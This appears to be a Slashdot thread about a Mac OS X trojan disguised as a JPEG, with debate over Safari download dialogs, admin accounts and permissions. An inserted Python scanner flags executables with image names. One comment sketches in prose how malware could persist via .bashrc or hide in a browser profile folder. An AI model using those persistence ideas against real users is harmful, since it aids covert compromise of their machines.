      The option I'm talking about, "Open safe files after downloading", does not apply to any of those cases. And you know that.

      You initially wrote, "No application that displays untrusted content should EVER have an option to open files automatically after downloading." You did not limit this to one option in Safari as evidenced by the "No application" part. Even if you did mean to limit it to Safari, you certainly did not limit it to just one setting in Safari and exclude all the HTML content Safari normally downloads.

      If the user has explicitly requested that the file be run, locally... rather than having that execution happen automatically without anything but simple dialog boxes after the link is clicked... it doesn't matter whether it's an application, a Dashboard widget, a screen saver, the user has explicitly requested execution, rather than simply allowed it to happen.

      I can't parse this sentence. What are you trying to say here? If you click a link to download something, then Safari warns you with a dialogue that it is an executable and asks if you still wish to download it. Then it asks you if you want it to be automatically installed in the proper location. I don't see the problem.

      Now, going back a few messages, you said Safari doesn't automatically run the file. Do you mean that Safari leaves the file in place and you have to explicitly navigate to and open it in Finder, or that Safari gives you a dialog box before calling Finder, which then gives you another dialog box?

      Safari warns you the file may contain an executable when you download it. If you tell it to continue the download it does so and leaves the file in your default download directory. In some configurations it may automatically open the .tgz for you, but all that does is save the contained script in the same location. You still need to navigate to this file with the Finder (Safari provides a shortcut in the download manager) and then double click on the script. In order to double click on it, you need to see it in the Finder, which by default will show you it has the wrong extension and will fail to show a preview of the image, which it shows for all jpegs. Safari is not the problem here.
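
The mismatch the post above relies on (a name and icon that say JPEG, contents that are a Unix executable) can be checked mechanically. This is an added example, not code from the thread or from Apple; the magic numbers are the standard JPEG, Mach-O and shebang signatures, and the sample files in `demo()` are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Well-known leading bytes ("magic numbers") of the formats involved.
JPEG_MAGIC = b"\xff\xd8\xff"
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce",  # 32-bit Mach-O, big-endian (PowerPC)
    b"\xce\xfa\xed\xfe",  # 32-bit Mach-O, little-endian (Intel)
    b"\xfe\xed\xfa\xcf",  # 64-bit Mach-O, big-endian
    b"\xcf\xfa\xed\xfe",  # 64-bit Mach-O, little-endian
    b"\xca\xfe\xba\xbe",  # universal ("fat") binary; Java class files share it
}
SHEBANG = b"#!"
IMAGE_EXTENSIONS = {".jpg", ".jpeg"}
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def classify(head: bytes) -> str:
    """Name the content type from the first bytes of a file."""
    if head[:3] == JPEG_MAGIC:
        return "jpeg"
    if head[:4] in MACHO_MAGICS:
        return "mach-o"
    if head[:2] == SHEBANG:
        return "script"
    return "unknown"


def is_disguised(name: str, head: bytes) -> bool:
    """True when the name claims an image but the bytes are executable code."""
    ext = os.path.splitext(name)[1].lower()
    return ext in IMAGE_EXTENSIONS and classify(head) in ("mach-o", "script")


def scan_file(path: str) -> dict:
    """Inspect one file: content type, execute bit, and the two red flags."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    executable = bool(os.stat(path).st_mode & EXEC_BITS)
    ext = os.path.splitext(path)[1].lower()
    return {
        "path": path,
        "kind": classify(head),
        "executable": executable,
        # Executable content behind an image name: the trojan's disguise.
        "disguised": is_disguised(path, head),
        # A real image never needs the execute bit; a double click would run it.
        "exec_image": executable and ext in IMAGE_EXTENSIONS,
    }


def scan_downloads(directory: str) -> list:
    """Return the findings that deserve a second look, sorted by path."""
    flagged = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            result = scan_file(os.path.join(root, name))
            if result["disguised"] or result["exec_image"]:
                flagged.append(result)
    return sorted(flagged, key=lambda r: r["path"])


def demo() -> list:
    """Build a constructed download folder and return the flagged basenames."""
    samples = {
        # constructed: a minimal JPEG header followed by padding
        "real_photo.jpg": (b"\xff\xd8\xff\xe0" + b"\x00" * 12, 0o644),
        # constructed: Intel Mach-O magic wearing a .jpg name, marked executable
        "leopard_shot1.jpg": (b"\xce\xfa\xed\xfe" + b"\x00" * 12, 0o755),
        # constructed: shell script with a .jpg name but no execute bit
        "leopard_shot2.jpg": (b"#!/bin/sh\necho constructed\n", 0o644),
        # constructed: an honest executable with no image pretence
        "installer": (b"\xce\xfa\xed\xfe" + b"\x00" * 12, 0o755),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, (data, mode) in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return sorted(os.path.basename(r["path"]) for r in scan_downloads(tmp))


if __name__ == "__main__":
    for name in demo():
        print("suspicious:", name)
```

Pointing `scan_downloads()` at a real download folder flags only files whose name and bytes disagree or whose image name carries an execute bit; the honest `installer` sample is left alone.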

    15. Re:Now I can say "I told you so". by argent · · Score: 1

      "No application that displays untrusted content should EVER have an option to open files automatically after downloading."

      Referring to the Safari "Open Safe Files After Downloading" option and similar mechanisms to open files outside the application's own sandbox in other programs.

      You still need to navigate to this file with the finder (Safari provides a shortcut in the download manager) and then double click on the script.

      Thank you for clearing that up.

      In that case, this is a minor problem.

      There have been "open safe files" exploits devised in the past, though, and there will unquestionably be some actually exploited in the future.

      If you click a link to download something, then Safari warns you with a dialogue that it is an executable and asks if you still wish to download it. Then it asks you if you want it to be automatically installed in the proper location.

      The first of those dialog boxes trains people to answer "yes" to these questions.

      The second makes it possible to exploit that training.

      Two "yes/no" dialog boxes is not significantly better than one "yes/no" dialog box.

      It would be far better for Safari to simply download the file and leave it sitting in the download manager, with appropriate indication of its content, without confronting the user with a "yes/no - respond now" dialog.

    16. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      Referring to the Safari "Open Safe Files After Downloading"

      Then you incorrectly phrased your sentence. It should read "Safari should NEVER have an option for any application that displays untrusted content to open files automatically after downloading."

      Two "yes/no" dialog boxes is not significantly better than one "yes/no" dialog box.

      Excepting of course that Apple does not use Yes/No dialogue boxes and their HIG calls for all such boxes to contain action verbs as the button titles. I think in this case you get a (Cancel/Continue) and then an (Install/Don't Install). This largely ameliorates the OK/Cancel rote training that is a problem on Windows.

      It would be far better for Safari to simply download the file and leave it sitting in the download manager

      The download manager is not a location, it is a list of what has been downloaded. Do you really think it is better to get users used to having to take the downloaded file and put it in some random path? Then what happens when they get a trojan that tells them the file needs to be put in some random location, like the startup directory? Don't you think they will no longer find such a thing unusual? I prefer the current methodology.

    17. Re:Now I can say "I told you so". by argent · · Score: 1

      It should read "Safari should NEVER have an option for any application that displays untrusted content to open files automatically after downloading."

      No.

      "No application (such as Safari, but not limited to Safari) should have an option to automatically open foreign untrusted content automatically after downloading."

      Excepting of course that Apple does not use Yes/No dialogue boxes

      It doesn't matter if "Yes" is marked "Yes", "Open", "OK", or "Whack me".

      It doesn't matter if "No" is marked "No", "Cancel", "Abandon", or "Go away".

      The point isn't what the dialog says, the point is that the dialog presents an accept/deny choice, that accept is the normal response, and the system as a whole presents accept/deny choices on a regular enough basis for it to become a reflex.

      People click those buttons before they are consciously aware of what the dialog says or what labels are on the buttons. Windows applications don't always label the buttons "yes" and "no" either, and people still get caught.

      Do you really think it is better to get users used to having to take the downloaded file and put it in some random path?

      No, and I didn't say they should.

      I said that it shouldn't do it automatically without an explicit request.

      Clicking "yes", "install", "ok", or "infect me" on a dialog box is not a request, it's approving an action that the untrusted content has requested.

    18. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      The point isn't what the dialog says, the point is that the dialog presents an accept/deny choice, that accept is the normal response, and the system as a whole presents accept/deny choices on a regular enough basis for it to become a reflex.

      I think you are still trained by Windowsisms. The dialogues don't represent a dichotomy and may have more than two options when presented. You can't just click "whatever is accept" because you don't know which one it is on a given dialogue. You actually have to read the dialogue and pick which one you want to do.

      No, and I didn't say they should. I said that it shouldn't do it automatically without an explicit request.

      Look, users don't know they have to "install" a dashboard in a specific location. They just want to download and install one from the Web. Your choices are then either give them an automated way to put it where it needs to be, or rely upon instructions that they are given with the file to tell them what to do with it. I think the former is a better option. It is more user friendly and it makes social engineering attacks more unusual and obvious.

      Clicking "yes", "install", "ok", or "infect me" on a dialog box is not a request, it's approving an action that the untrusted content has requested.

      True, but that does not make them a bad idea. If you have to click "infect me" to get a virus, then you are a lost cause or you probably really want a virus.

    19. Re:Now I can say "I told you so". by argent · · Score: 1

      Look, users don't know they have to "install" a dashboard in a specific location.

      I didn't say they should have to. I said they should explicitly request an install.

      Please try reading for content.

      If you have to click "infect me" to get a virus, then you are a lost cause or you probably really want a virus.

      I didn't say I thought the people who clicked the equivalent button at work were the brightest bulbs in the box, but that didn't mean I didn't have to go in and clean up after them.

      The Mac guy who insisted he didn't need to set WEP security on his Wifi access point because Macs couldn't get viruses wasn't any brighter.

      The people who provide the pool of infected machines on any platform are the source of all kinds of great tech support stories, but you can't ignore them, and when it comes to security you have to design your software with these guys in mind.

    20. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      I didn't say they should have to. I said they should explicitly request an install. Please try reading for content.

      You try reading for content. How can they explicitly request a program be installed if they don't know it needs to be installed? This is OS X. Installing is a rarity, most programs are dropped in the Applications folder. Dashboards won't work there and need to be put in a specific place. That means they need to be moved by the system or they need to have instructions the user follows. You propose adding extra, unnecessary steps to the process because you believe dialogue boxes are inherently insecure. You're wrong. Extra steps leave extra room for social engineering. Dialogue boxes work when properly implemented, as I believe they are in this case.

      I didn't say I thought the people who clicked the equivalent button at work were the brightest bulbs in the box, but that didn't mean I didn't have to go in and clean up after them.

      Here's an idea, just cut the power cords of the machines. They won't do anything then and you won't have to clean up after anything. Good security lets the user do what they want and informs them what is going on. What you propose is making it hard for users to do what they want in the hopes that they will give up.

    21. Re:Now I can say "I told you so". by argent · · Score: 1

      How can they explicitly request a program be installed if they don't know it needs to be installed?

      If the program needs to be installed, what they will download will be an installer, so when they explicitly request it by opening it in Finder it will be installed. Similarly, other files that need to be installed already have handlers that Finder can use after the user requests it to install.

      The only difference is that instead of facing the user with a "choose now" dialog box, the user makes an explicit request to open the object when they decide to. That small difference, between "responding to a dialog requesting action" and "making a request for action" makes a huge difference.

      Good security lets the user do what they want and informs them what is going on.

      I agree. Good security lets the user do what they want. Good security doesn't let a potential attacker do what they want, subject to a snap decision by the user.

      I am not proposing making it hard for the user at all. For the normal case, the user will even end up performing the same number of actions: instead of clicking "Open" in the dialog box, they will select "Open" in the download manager.

    22. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      If the program needs to be installed, what they will download will be an installer, so when they explicitly request it by opening it in Finder it will be installed. Similarly, other files that need to be installed already have handlers that Finder can use after the user requests it to install.

      And you think this is a good idea from a security perspective? You're nowhere near paranoid enough. Most security people I know avoid installers whenever possible, since it is already the method of choice for installing spyware, rootkits, and messy programs that scatter files everywhere. The only reason to use one is for a program that needs to install new kernel modules, drivers, or subsystem elements. Regular user space applications, or applets that use them, make me very, very suspicious. I'd much rather the OS is hard wired to put dashboard widgets only in their proper place than that users are conditioned to run arbitrary "installer" applications that put files wherever and do who knows what else. Think about it: what is worse, a user is tricked into having a possibly malicious widget installed in the right place so that if they ever run that widget and it has permission it can do damage, or a user is tricked into running a malicious installer that runs right then (and users are already conditioned to think installers often need your password for some reason)? No thanks.

      I agree. Good security lets the user do what they want. Good security doesn't let a potential attacker do what they want, subject to a snap decision by the user.

      You don't get it. A "snap decision by the user" is another way of saying "a quick and easy action based upon the user's choice." All you are adding is making it harder to do things because you think it will make users think more. All you are doing is proposing a harder to use UI, with additional steps to confuse the user and add social engineering attack space.

      instead of clicking "Open" in the dialog box, they will select "Open" in the download manager.

      No, since the download manager is specific to the downloading application.

      I just don't agree with your recommendations. They are all based upon the premise that dialogue boxes are bad. As a security guy and a UI guy my opinion is they are not. Just because one implementation is bad does not mean the concept is bad. They work and work well. As it stands, the system is more secure, in my opinion, than any of your suggested improvements.

    23. Re:Now I can say "I told you so". by argent · · Score: 1

      And you think this is a good idea from a security perspective?

      What, that a program should come in an installer? No, I didn't say that. I said that when installation is required, it already comes in an installer.

      I'd much rather the OS is hard wired to put dashboard widgets only in their proper place than that users are conditioned to run arbitrary "installer" applications

      I didn't say that you would use "installer" applications for things like dashboard widgets. I said that, just like right now, Finder would call LaunchServices to find the right application to open (in this case, install) the widget.

      The only difference is that Safari wouldn't be asking Finder to do it at the request of a potential attacker, but rather at the request of the user.

      All you are adding is making it harder to do things because you think it will make users think more.

      It's the same number of steps. It's not harder, it's a slightly different process that changes the operation from one that's initiated by the attacker to one that's initiated by the user.

      And it's not making users think more, it's giving them a chance to think, and it really does work.

      They are all based upon the premise that dialogue boxes are bad.

      No, they are based on the premise that in this context dialog boxes do not add enough to the security of the system. They're not "bad", they're just not the right tool to use here.

  81. Trusted executables by seweso · · Score: 0

    Why not mark every executable from external sources as not-trusted? And when an untrusted executable is executed a dialog should be presented.

    1. Re:Trusted executables by John+Newman · · Score: 1

      OSX sort-of does this already. Whenever you launch an executable for the first time - either directly or indirectly, by opening a dependent data file - OSX puts up a prompt warning you that you are about to execute program XXX for the first time, and asking if you're sure you want to do this. So every executable is considered non-trusted the first time you run it. This trojan ought to trigger this dialog, which I'd think would cause even most novice users to wonder if something odd was going on.

  82. Bon Jour? by Rob+Nance · · Score: 1

    Surprised nobody has said it yet, but who uses Bon Jour? I've never even heard of it. iChat or Fire for me. I know this problem is not Bon Jour specific, but like lots have said, Safari will ask when an executable is being received via download. We all know IM is susceptible, and we all know OSX is not bulletproof. Use common sense and move along, nothing to see here.

    1. Re:Bon Jour? by LemonYellow · · Score: 1

      Bonjour is the new name for Rendezvous. It isn't an application like Fire or iChat, it is a mechanism for programmes to find each other over a network. If you're using iChat, you're using a programme that includes Bonjour; it is how iChat finds other iChat users on the local network.

    2. Re:Bon Jour? by davidsyes · · Score: 1

      Maybe Jon Bon Jour-VII?

      --
      Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  83. /Library permissions by alanQuatermain · · Score: 2, Informative

    Disclaimer: I write network management software for Mac OS X; I have therefore seen a fair bit of what can happen with mis-configured system folders.

    I'd advise you not to change permissions on /Library, or at least please don't do it recursively. You're asking for pain there. /Library/Application Services, /Library/Caches, /Library/Frameworks are supposed to be writable by administrators.

    The reason your root library folder is writable by members of the Admin group is because that's what it's for. There's /System/Library, which is owned by root/wheel. There's /Library, which is where the machine's administrator can install things for all other users, and there's ~/Library where any user can write their own things into their own personal space.

    The reason the root one is writable by admins is simply because that's the place where admins (which are, you know, admins for a reason) can write things. Things like all the fonts installed by Macromedia Flash. Things like all the project templates, SCM, Design, WebObjectsGUI plugins for Xcode. Things like InterfaceBuilder palettes. Things like Adobe fonts, SVG viewer resources, color profiles. You know, things used by all users of the machine. But which a machine administrator can change or remove. That's kinda the point of the Admin group.

    Also, please take note that the sticky bit is set on the Library folder. So you'll need to chmod 1775 /Library. Oh, and I hope you're prepared for some stuff to stop working, because it quite likely will. I've seen what happens when people decide to arbitrarily make most of the system writable only by their One True User (whoever that may be). I then get many tech support calls where we try to figure out why my software is making all their software stop working. It then transpires that their software just doesn't have permission to access the disk, and just can't install things, use caches, etc. Or it's using a home folder -- mounted from a remote server -- for all that, and is therefore taking *ages* since another fifty people are doing the same thing.

    At the end of the day, there probably is an argument for not letting Admin accounts create folders within the /Library folder, so for example only root can create the InputManagers folder. That would be the same as the StartupItems thing, and it's likely what Apple will do. But don't apply those rules to Application Support and suchlike. It'll hurt, believe me.

    -Q

    1. Re:/Library permissions by geekoid · · Score: 1

      Now see, you warned him, and that took all the funny away.
      I was happy thinking this guy was going to create himself a barrel of interesting times.

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  84. Power Button? by ProfessionalCookie · · Score: 1

    Mac users don't use their power buttons to shut down their computers. The power button puts the computer to sleep.

    PS What do you mean by "turn a computer off"...is that like a "restart"

  85. Time to get into the habit of read-only filesys? by reed · · Score: 1

    I wonder if it would make sense for MacOSX (And user-oriented Linux distributions?) to keep all binaries and libraries etc. (i.e. not /home) normally read-only (unless you are in the middle of uninstalling/upgrading of course). (I know that some people keep servers and "appliance" type systems like this already). Until now, this kind of trojan has been localized and rare, but with the popularity of OSX, this one could be a turning point.

    Anyone want to make a hack of dpkg to try this on Debian?

  86. Re:Um, OK by Anonymous Coward · · Score: 0

    My password is "password" and my IP address is 192.168.1.100.

    Do your worst!

  87. Re:Time to get into the habit of read-only filesys by argent · · Score: 1

    I wonder if it would make sense for MacOSX (And user-oriented Linux distributions?) to keep all binaries and libraries etc. (i.e. not /home) normally read-only (unless you are in the middle of uninstalling/upgrading of course).

    They do. Normal users have no write access to system directories, the installation process runs as a privileged user that has write access. The thing is, you don't need write access to system directories to launch malware, or have it auto-executed when you log in... there's plenty of places for it to hide in your home directory in any system...

  88. sophos press-release: by srblackbird · · Score: 1
    --
    "The test of the morality of a society is what it does for its children." -Dietrich Bonhoeffer
  89. malware doesn't need privileged access by argent · · Score: 1

    Malware doesn't need privileged access to find a hiding place.

    When I was at Berkeley in 1978 people were already putting trap files in their home directories to catch people snooping around and do nasty stuff to the intruder's accounts, including hiding backdoors in their login scripts... and this was on Version 6 UNIX, a system so primitive the shell didn't even have native flow control built in.

    Restricting the scope of malware by restricting user privileges is great, it gives you an easier recovery path, but it's not a panacea.

  90. Human Stupidity by SchrodingersRoot · · Score: 1

    First, let me say that human stupidity is how the vast majority of malware spreads, and can generally be relied upon. It's one of those, ya know...universal constants. As Einstein said: "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." Moreover, if Apple picks up marketshare, especially with iMacs (e.g. more of a consumer level product), as it could be poised to do with the Intel deals struck, the average level of user savvy will drop. So stupidity can be relied upon to increase. Especially since knowledgeable users are more wary of Intel procs in general (though the mobile chips are somewhat excepted here). However, it is, as you imply, worthy of note that it doesn't exploit security holes.

    Anyway, I can't help but idly wonder if /. mightn't have had something to do with this, what with the article that appeared a month ago. Sort of a proof of concept challenge, if you will.

  91. Oblig. Symantec Link. by Khyber · · Score: 1

    This is not a virus. It's not self-replicating. Implant this very helpful link's information into your brain, so we can finally understand WTF the difference is between virii/trojans/worms.

    Take the advice from one of the 'top' companies in AV protection.

    --
    Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    1. Re:Oblig. Symantec Link. by geekoid · · Score: 1

      "...virii/trojans/worms."

      virii is not a recognized use, and if you can't get that through your brain, it certainly shouldn't be giving information about Viruses/trojans/worms in general. Even your link uses the correct term.

      Besides this, the specific definition no longer matters outside of the AV industry. Users don't care, they just want it fixed.

      http://en.wikipedia.org/wiki/Virii

      http://linuxmafia.com/~rick/faq/plural-of-virus.html

      http://foldoc.org/?viruses

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  92. boy, you guys are desperate for an excuse. by geekoid · · Score: 1

    Look, we know technically it is not a virus; but I have to say "Welcome to the world." All these things get labeled as a virus. The PC world fought that for years, but ultimately the media has won. Mostly because people don't care. All they care about is that it is impacting their machine and they want it fixed.
    It's like when someone's starter goes out in their car. They don't want a 20-minute lecture on why, they just want to know how much it costs, and how soon it will be ready.

    --
    The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  93. Gentlemen, start your time machines... by mikiN · · Score: 1

    This exploit is actually an example of a very old idea. A proof of concept can be found in this followup article from March 2004 (the link to the original article is already dead and buried), which also mentions the need to visually identify executable files.

    --
    The Hacker's Guide To The Kernel: Don't panic()!
  94. This was a pretty lame virus by ChrisA90278 · · Score: 1

    It's a pretty poor virus. The OS puts up a dialog box stating that there is an executable program inside and asks you to type in the Admin password and click OK to run it. A user would need to be "way stupid" to do that when he thought he was just going to look at a JPG image file. Needless to say this "virus" did not get very far and no one knows of any damage caused by it.

  95. computer system is only as secure... by lcde · · Score: 1

    This article gives a lot of good points in a short amount of time.

    The gist of it is that *nix IS more secure. There is no doubt about it. But Social Engineering and other things of the great modern email scams can still penetrate in and run.

    But I guess that goes without saying. The chain is only as strong as your weakest link and the computer system is only as secure as its stupidest user.

    This wasn't discussed. All the article talks about is a virus that comes into your /home directory and destroys your data. Unix still runs, no downtime, start again. Really only the recent Karma Sutra virus goes around and destroys data. Most act as zombie drones.

    But imagine this. A computer virus comes in your system and runs in your /home(user done). It doesn't destroy your computer but installs as a .bashrc line to execute in some common User privileged library. Now, to us we might see that the file was modified or that there is a file that we didn't install hidden in our home directory. But really, who here knows what's in .firefox/default/aso8zx9mawmSOI/ ? I sure as hell don't. And there has to be some GUI linux programs that run background command lines so you know .bashrc will be executed. So the .css files that are in .firefox/default/aso8zx9mawmSOI/, name your virus chrome_main.css. When was the last time you checked that folder for executables?

    Especially in an OSX environment where the users are tricked to believe that the system is secure. As a unix system it might never get any worms or other propagating viruses embedded deep into the system but there are still a ton of stupid users.

    You can even imagine it being smart enough to update itself IF an OSX vulnerability is known and then elevate itself to root and install deeper into the OS. I have no clue what's in /Library and I normally don't fool around with it. Or even /bin/gnuc and if you execute it without the proper switch it just prints out 'The program cannot be executed in the terminal, It must be called from another program'.

    Either case, good short read. (I think my comments are almost longer.) No matter how good we think we are at knowing our systems there is someone who knows we don't look in /random/directory that is known to have write access to all users. This is where a virus can lay around and execute.

    --
    :%s/teh/the/g
    1. Re:computer system is only as secure... by geekoid · · Score: 1

      "...computer system is only as secure as its stupidest user."

      actually I think:
      computer system is only as secure as its stupidest developer.

      is far more accurate.

      and then:
      computer system security implementation is only as secure as its stupidest user.

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  96. Re:I call Dupe by Anonymous Coward · · Score: 0

    > Apple made it so that the .app extension cannot be hidden

    What? None of the applications in my /Applications folder have the '.app' extension visible (but the extension is there).

  97. God you idiots are stupid by Anonymous Coward · · Score: 0

    You're wasting your day coming up with solutions for an OS you don't own, don't maintain, and have no control over.

    You're such idiots. No wonder slashdot has such a crappy reputation. It's full of morons who think they're brilliant.

  98. Re:It's not a virus... bzzt. Wrong Fanboi! by Anonymous Coward · · Score: 0

    Definition of a virus from wikipedia: In computer security technology, a virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. This virus does these things. It replicates itself into other executable code or documents. It spreads itself via iChat to your contacts. Arguing that it isn't a virus because someone has to do something to activate it shows a good level of cluelessness. Hint - look up the definition for 'worm'. Perhaps that's what you're thinking of. Those who are calling it a Trojan are even further off the mark. Trojans don't spread themselves. Sorry, you're wrong. Try again later.

  99. I'm curious by Tim+Browse · · Score: 1
    This seems to be exactly the same type of attack as a lot of the Windows email worms - e.g. give the user a file that is of type A, but fool them into thinking it's of type B (and hence less dangerous).

    If instead of failing to do something to Fire.app, the trojan had scurried through the Mac OS X address book, and then sent the file as an attachment in an email to all your contacts, and some of them had opened the attachment, etc. and so it had propagated like that, then would the Mac zealots admit there was a problem then?

    My main question is - what actually causes the admin authentication dialog to open? Is it just the fact that you're trying to run a program that Mac OS X hasn't seen before? If not, then would trying to open a TCP/IP socket (e.g. to a mail server) cause the user to have to authenticate as admin? If not, then this seems like a lucky escape to me - this could have spread quite widely amongst Mac users.

    Btw, Windows has a system for marking EXEs as untrusted (in some way - using a special stream, iirc) - IE and FF do this, I believe. So the first time you try to run the EXE, Windows asks if you're sure, and explains why. Does Mac OS X do this? Is this why the admin dialog appears?

    Enquiring minds want to know. :-)

    (BTW, anyone claiming Mac users wouldn't fall for social engineering in the first place needs to get a grip)

    1. Re:I'm curious by cnerd2025 · · Score: 1

      Mac OS, like all Unix systems, requires higher-level access for different function calls. Think about, for example, NMap. It requires root access to run most of its features, otherwise it will only perform a few functions. This permissions-based system is also used in Mac OS X. If a program makes a function call that requires special authorization, then the little prompt comes up and asks for the admin password. You don't have to enter the password more than once for a particular application's session, but once it is closed, it must be reauthenticated. For example, to change settings in the "system preferences" application, one must enter the password for certain panes to be accessible. When sys prefs is closed or a little "lock" is locked, the same thing must happen. Also, when apps are being installed, Mac OS has a subroutine in its installer requiring administrative password authentication. Permissions-based file systems are much more secure than Windows type file systems, where access is granted for most directories, and is "denied" for others. Most of the "denied" directories I find to be viruses. This may be considered a virus, simply because it was written to be one. But if it pops up and asks for a password, it is nothing more than a sitting duck. What Apple needs to do is wake up and patch the Unix flaws that have been fixed for 15 years. They are probably all documented from various BSD resources, and many of the flaws can probably be fixed directly from their source code.

    2. Re:I'm curious by Tim+Browse · · Score: 1
      Two things:

      1. You seem to be using 'permissions-based file systems' to refer to the default permissions? And not to refer to the fact that the file system supports permissions of various levels. For instance, Windows ACLs permissions have finer granularity than Unix-style permissions (Tiger added support for ACL style permissions). Or am I misunderstanding?
      2. So is opening a socket deemed to be a function call that requires administrative authorisation? I find it somewhat hard to believe that MSN Messenger, Fire, iChat etc all require you to authorise them with system permissions whenever they open a connection to a server or peer? (Mainly because I've used Messenger on OS X, and I don't remember it ever asking me for an admin password.)

      So my point is, in case it's not clear, if you can get the user to run a program in this fashion, then the program can propagate across the internet without needing admin privileges?

  100. The brilliance of shipping iPhoto with new Macs by SuperKendall · · Score: 2, Interesting

    I just realized how smart it is of Apple to ship iPhoto with new consumer Macs.

    See, if a trojan like this comes along with something unpleasant really novice users will try to move it into iPhoto - which will just say "sorry, that's not an image".

    More advanced users that would just try and open an image in Preview would say "Opening an image file and it asks for my password? No thank you sir!".

    Which is why this trojan has not really spread, or really affected many computers.

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  101. FUD of the day by Overly+Critical+Guy · · Score: 5, Insightful

    This story is the biggest FUD of the day.

    1.) Several proof-of-concept viruses have been written for OS X in the past, so this isn't the "first." They never propagate.

    2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue.

    3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

    Like I said--FUD of the day.

    --
    "Sufferin' succotash."
    1. Re:FUD of the day by toadlife · · Score: 1

      "2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue."

      So does every other browser on the planet. This safety feature doesn't seem to protect Windows users. Why would it protect Mac users if there were enough of them to be relevant?

      "3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue."

      Does every single program you run in OSX require an admin password, or just programs that try to write outside of the user's space? Could not a program be written to stay inside of the user's space and thus, not require a password?

      --
      I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
    2. Re:FUD of the day by Overly+Critical+Guy · · Score: 1

      Safari scanning compressed files and warning users that it's got an executable (requiring the user to click "Download" to continue) means this is a user flaw, not a system flaw. Other browsers warn too, though not for compressed files, but that means this isn't an OS X virus or trojan but a user-run program. And even so, applications like this that attempt to modify the system or the user's settings (like InputManager) require a password. A program written "inside of the user's space" as you put it wouldn't have much to do and wouldn't propagate.

      --
      "Sufferin' succotash."
    3. Re:FUD of the day by javaxman · · Score: 1, Insightful
      3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

      ... with the important exception of when you're running as an Admin user, in which case you don't get this important opportunity to prevent the program from modifying files it shouldn't.

      I don't know anyone stupid enough to use their OS X admin account all the time... OK, I lied. I really have to stop using this admin account... damn...

      Of course, that whole file-extension thing should be a big tip-off, too. It's not like this is going to spread like wildfire. It's just a wake-up call to folks
      (a) hiding file extensions... why do that? Show them, they're important.
      (b) running as Admin. We have to not be so lazy. It's ok that we'll have to type our password.

      But mostly (b). If some old-school OS 9 user can't grok file extensions, they sure as shoot shouldn't be using an Admin account...

    4. Re:FUD of the day by AvitarX · · Score: 1

      Can the user send email messages?

      use telnet?

      modify things to start when they log in?

      delete files?

      all of those seem dangerous to me.

      Also, disguised program tricking the user to click it and doing destructive things sounds like what a trojan is, but again I am not really in the know.

      --
      Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg
    5. Re:FUD of the day by toadlife · · Score: 1

      In the two OS's I run (FreeBSD and Windows), programs can easily stay inside of the user's space and still propagate - for example, by connecting out via email, or IRC, and they can easily set themselves to start at boot-time, before logon (FreeBSD : crontab/Windows: Task Scheduler).

      What in OSX prevents this?

      Can regular users in OSX start their own crontab? Can an IRC client executable run from a user's folder? How about a little self contained SMTP engine?

      As for other browsers not giving out warnings like Safari, for any file you download, Internet explorer warns that 'Files from the internet might be dangerous, and not to open the file if you don't trust the source'. Firefox just asks what you want to do - open or save.

      --
      I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
    6. Re:FUD of the day by 99BottlesOfBeerInMyF · · Score: 1

      1.) Several proof-of-concept viruses have been written for OS X in the past, so this isn't the "first." They never propagate.

      This isn't a "proof-of-concept" it was discovered in the wild, albeit at a direct point of infection. It has already propagated, or attempted to, in the wild as well, sending file transfer requests to other machines on a LAN.

      2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue.

      If I'm not mistaken it warns you that it "might be" an application, as it does with all archives in .zip, .gtz, or .dmg format. Also, not everyone uses Safari.

      3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

      ...Unless you are running an admin account. Then it just runs. Like a lot of clueless people who only set up one account when they buy a machine. Maybe even most people.

      This is not going to spread far and wide for numerous reasons and has no real payload and bugs prevent it from working properly. This is not a serious threat to most people. It is however, a first OS X virus in the wild and seems to have been written by someone with a clue. It also seems unfinished. This may be the basis for more malware in the future.

      OS X does better than most OS's under this type of an attack and this threat is minimal. Hopefully, however, this will spur Apple to actually improve the default security of their systems both with a default non-admin account on setup, with better GUI indications of what a file is and is doing, and with BSD jail, VM sandboxes, or really cool ACLs that default to limited permissions for any new software. Frankly, Windows desperately needs this right now, but OS X could benefit from it as well and give MS something to copy.

    7. Re:FUD of the day by MattHaffner · · Score: 4, Informative
      ... with the important exception of when you're running as an Admin user, in which case you don't get this important opportunity to prevent the program from modifying files it shouldn't.


      What are you talking about? Admin accounts normally get password popups to do anything like this (system updates, system-wide installers, etc.). Are you saying in this specific instance it doesn't?
    8. Re:FUD of the day by Arandir · · Score: 4, Informative

